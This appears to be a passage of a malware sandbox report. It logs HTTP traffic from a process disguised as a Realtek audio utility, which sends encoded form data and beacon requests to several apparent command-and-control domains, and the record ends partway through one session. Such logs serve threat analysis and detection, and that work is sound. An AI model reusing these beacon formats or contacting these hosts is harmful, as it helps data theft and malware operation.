                                                                          Jan 9, 2025 16:48:34.821835041 CET | 792 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
                                                                          Jan 9, 2025 16:48:35.800178051 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:35 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.11.20 | 49759 | 47.83.1.90 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:37.664752007 CET | 812 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
                                                                          Jan 9, 2025 16:48:38.696535110 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:38 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.11.20 | 49760 | 47.83.1.90 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:40.502289057 CET | 2578 | OUT | POST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:40.502326012 CET | 5383 | OUT
                                                                          Data Ascii: x1CC5CLY0SfKu8oIrnm526YpOXCD266Y31M5pQBNyLwPnVZahVK5neJscwGKTPakaJ5AeTjdgJIWdEV23RLIDCVcroa9Ny/AEEt42oOcxCZuEZo4aX0BNRSHBByKWCDNZLG0CaxFBXO1FfpYjyV7gJBssljeqMgirhxwwvWLyQORtnarNab21QtoDfj2V0oYqFGBY0Baiw7KtowndhyNXrFs3RIonc4I+x7556bZQ3AvTCtcpgu
                                                                          Jan 9, 2025 16:48:41.498956919 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:41 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.11.20 | 49761 | 47.83.1.90 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:43.342102051 CET | 529 | OUT | GET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:44.345208883 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:48:44 GMT
                                                                          Content-Length: 17
                                                                          Connection: close
                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                          Data Ascii: Request too large


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          17 | 192.168.11.20 | 49762 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:49.659240007 CET | 795 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
                                                                          Jan 9, 2025 16:48:49.795423031 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          18 | 192.168.11.20 | 49763 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:52.318074942 CET | 815 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
                                                                          Jan 9, 2025 16:48:52.453670979 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          19 | 192.168.11.20 | 49764 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:54.994981050 CET | 2578 | OUT | POST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bonheur.tech
                                                                          Referer: http://www.bonheur.tech/t3iv/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:54.995001078 CET | 5386 | OUT
                                                                          Data Ascii: Osiy2+qqH+Yn5ECwLMEj+EwfBnD3yc1itD+cmOmwSfwwUTU+SeP9B7uvR6qJjBKL8JXhboTrM7CE/WLKXFxN1oxq4x3145yC29QWGt71TcHLBFXfLGEyHDrmAvmy94dJihsZnOJD8pg3/9TwDSXm6MTgSvKK4b7VwJ39ltDPo1H11NEKBhGIpkZCtGZ9o84PEhrDpChE3wpt7tKu42LIwVCRUKm4581LQFFYj6X3Ugs2BFmaqFN
                                                                          Jan 9, 2025 16:48:55.133171082 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          20 | 192.168.11.20 | 49765 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:48:57.663496971 CET | 530 | OUT | GET /t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:48:57.803649902 CET | 374 | IN | HTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:48:57 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          21 | 192.168.11.20 | 49766 | 160.25.166.123 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:05.620799065 CET | 783 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
                                                                          Jan 9, 2025 16:49:05.970071077 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:05 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:05.970114946 CET | 200 | IN
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          22 | 192.168.11.20 | 49767 | 160.25.166.123 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:08.501307964 CET | 803 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
                                                                          Jan 9, 2025 16:49:08.852286100 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:08 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:08.852333069 CET | 200 | IN
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          23 | 192.168.11.20 | 49768 | 160.25.166.123 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:11.394234896 CET | 1289 | OUT | POST /bwjl/ HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.rpa.asia
                                                                          Referer: http://www.rpa.asia/bwjl/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89lx9pvuiBLA/b56XFXL46RUkkJA4Jto2fdMy3LNwiFcoxtURo5KaHORc063o2sgAEESI+v3NwXyqpTQIRHn/07LB9ik1kiBjZzCkekun8Dw/7H45GIUPGokO+yXqFhsHHOlg4VatEiIEZ0rtjOCCvvjxLcR4wnCBuLM8dViAKcJ3Irqrx69FT+ExeY49n403iE2b8uepxL6LYfBYvicqRpi1VVz4PHjEr0ih2d7+2CYllo2kxFZE9ZlewQZ2FUrdBECzjUQprI+2lu84Eb4Y3AmcS+1vh86YB7cDkBc/L+te1Ja/SBLsL+5tSuRd2rSkKy7TGSkcJ3Od3HHSAVpQ+FGOCkUjtVyy474RpR3AJ6mgr5qZVPKTrVQ/X1sC9LVkxJzfbg2If3lv84aN75soJUUgqi44ndrb5JHzdpuAIzVGeOeG78zJ+vowD0Y5lmTvY4zof1N9lyKYzXX0QBpbBvolu7yM56i/TiqZMaHNNS7wqFqr3JS1+vC7AhGtWMjJ6IujVCsRsgK+qUIHWJmgJEJzZVyXSvsjVkfyhhCk916FtrfIt4i2EJtmWOqJI9TKWVFYBLK+i0lnJgTm4Mk9NWb9HemyRHYowXvCTOFWE1H7WUZctYCr7MowHq7SXMBaDml2lodYWp75l6VH5eyS
                                                                          Jan 9, 2025 16:49:11.394298077 CET | 6663 | OUT
                                                                          Data Ascii: Ne+lqxnZdpDr2jXSKpcDUV6jwsTkePhvZaT84T+MvaO3waHYRCTFYfyME86lgYlt4dJ58EfwdM8XBu/cmkLl5OU16BTneJScuZ2MHe5dE2VvhIczCcqhjC3CULC19rSMvKRg35UemXW4CCD/3mGYxVJ9C154GPlSEF+dLnqKP5/M0mSxjhvdbcjMh7THfDR7Mtz7AFa1F2pi4jacqEvRD8xeEf0hwQSb7GuAPT2Kjp5dkVb4u2k
                                                                          Jan 9, 2025 16:49:11.747670889 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:11 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:11.747716904 CET | 200 | IN
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          24 | 192.168.11.20 | 49769 | 160.25.166.123 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:14.279927015 CET | 526 | OUT | GET /bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.rpa.asia
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:14.627182007 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                          pragma: no-cache
                                                                          content-type: text/html
                                                                          content-length: 1251
                                                                          date: Thu, 09 Jan 2025 15:49:14 GMT
                                                                          server: LiteSpeed
                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                          Jan 9, 2025 16:49:14.627224922 CET | 200 | IN
                                                                          Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          25 | 192.168.11.20 | 49770 | 104.21.13.141 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:19.912571907 CET | 795 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
                                                                          Jan 9, 2025 16:49:20.045648098 CET | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:19 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpzrW1OaMxavkcX3%2FRE174E5yAEvT7UybNvn3FjGSpfC3Vnv9FQDuWkJirdzOFpRpCIIUN8Bex7hfiNKi6CunhbX8K%2FDpuU3bYUFJ3hdulQB0jV5sOtSOX1a5RTq22%2Ba5rMZ"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff5939fdc5610ea-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          26 | 192.168.11.20 | 49771 | 104.21.13.141 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:22.564306974 CET | 815 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
